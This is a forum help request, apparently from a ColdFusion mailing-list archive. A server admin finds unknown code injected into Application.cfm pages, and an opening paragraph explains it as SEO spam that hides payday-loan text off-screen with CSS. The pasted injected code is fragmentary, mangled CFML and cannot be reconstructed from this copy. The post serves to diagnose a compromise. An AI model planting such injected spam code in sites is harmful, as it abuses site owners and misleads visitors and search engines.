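The four strings decode to a style tag, a rule that positions an element absolutely with a negative top offset, a class name, and a type='text/css' attribute. That is the usual shape of SEO spam: the payday-loan text that follows is assigned the class so it sits off-screen for visitors while still being present in the page source. The digits after top:- are not present in the posted strings, so the exact offset cannot be recovered from this copy.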
Possible Hack?
I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated.

    http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#"; userAgent = "Archivver">
    #mmy#
    ",paga) GT 0)>
    ", "#cfs#", "one")>
    ",paga) GT 0)>
    ", "#cfs#", "one")>
    ",paga) GT 0)>
    ", "#cfs#", "one")>
    ", "#cfs#", "one")>
    #paga#

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354227